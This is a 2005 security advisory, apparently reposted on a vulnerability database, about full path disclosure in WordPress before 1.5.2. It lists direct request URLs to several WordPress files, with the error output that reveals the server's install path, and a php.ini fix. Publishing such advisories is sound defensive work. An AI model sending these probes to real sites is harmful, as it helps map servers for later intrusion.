Full path disclosure on WordPress < 1.5.2

2005.12.22
Credit: Dedi Dwianto
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2005-4463
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

ECHO.OR.ID ECHO_ADV_24$2005 --------------------------------------------------------------------------- [ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2 --------------------------------------------------------------------------- Author: Dedi Dwianto Date: Dec, 20th 2005 Location: Indonesia, Jakarta Web: http://echo.or.id/adv/adv24-theday-2005.txt --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : JAF CMS version: < 1.5.2 URL : http://wordpress.org/ Description : WordPress is a very popular personal publishing platform aka blog software, and is used by everyone from celebrities, to government officials, to non technical average joe's. --------------------------------------------------------------------------- Vulnerabilities: ~~~~~~~~~~~~~~~~ A. Full path disclosure: A remote user can access the file directly to cause the system to display an error message that indicates the installation path. The resulting error message will disclose potentially sensitive installation path information to the remote attacker. * http://victim/[WP Folder]/wp-includes/vars.php?PHP_SELF%20=dudul POC : http://localhost/blog/wp-includes/vars.php?PHP_SELF%20=dudul Fatal error: Call to undefined function: get_settings() in /var/www/html/blog/wp-includes/vars.php on line 106 * http://victim/[WP Folder]/wp-content/plugins/hello.php POC : http://localhost/blog/wp-content/plugins/hello.php Fatal error: Call to undefined function: wptexturize() in /var/www/html/blog/wp-content/plugins/hello.php on line 44 * http://victim/[WP Folder]/wp-admin/menu-header.php?self=dudul POC : http://localhost/blog/wp-admin/menu-header.php?self=dudul PHP Fatal error: Call to undefined function: get_admin_page_parent() in /var/www/html/blog/wp-admin/menu-header.php on line 6 Fatal error: Call to undefined function: get_admin_page_parent() in /var/www/html/blog/wp-admin/menu-header.php on line 6 * http://victim/[WP Folder]/wp-admin/upgrade-functions.php POC : http://localhost/[WP Folder]/wp-admin/upgrade-functions.php Warning: main(ABSPATH/wp-admin/admin-functions.php): failed to open stream: No such file or directory in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3 PHP Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php' (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3 Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php' (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3 * http://victim/[WP FOlder]/wp-admin/edit-form.php POC : http://localhost/blog/wp-admin/edit-form.php PHP Fatal error: Call to undefined function: _e() in /var/www/html/blog/wp-admin/edit-form.php on line 3 Fatal error: Call to undefined function: _e() in /var/www/html/blog/wp-admin/edit-form.php on line 3 * http://victim/[WP FOlder]/wp-settings.php POC : http://localhost/blog/wp-settings.php Warning: main(ABSPATHwp-includes/wp-db.php): failed to open stream: No such file or directory in /var/www/html/blog/wp-settings.php on line 59 PHP Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php' (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-settings.php on line 59 Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php' (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-settings.php on line 59 * http://victim/[WP FOlder]/wp-admin/edit-form-comment.php POC : http://localhost/blog/wp-admin/edit-form-comment.php Fatal error: Call to undefined function: __() in /var/www/html/blog/wp-admin/edit-form-comment.php on line 2 B. Fix For User and do not know how to fix the script , change php.ini file setting then turn on log_errors , and turn off display_error --------------------------------------------------------------------------- Shoutz: ~~~~~~~ ~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous ~ newbie_hacker@yahoogroups.com ~ #e-c-h-o@DALNET --------------------------------------------------------------------------- Contact: ~~~~~~~~ the_day || echo|staff || the_day[at]echo[dot]or[dot]id Homepage: http://theday.echo.or.id/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top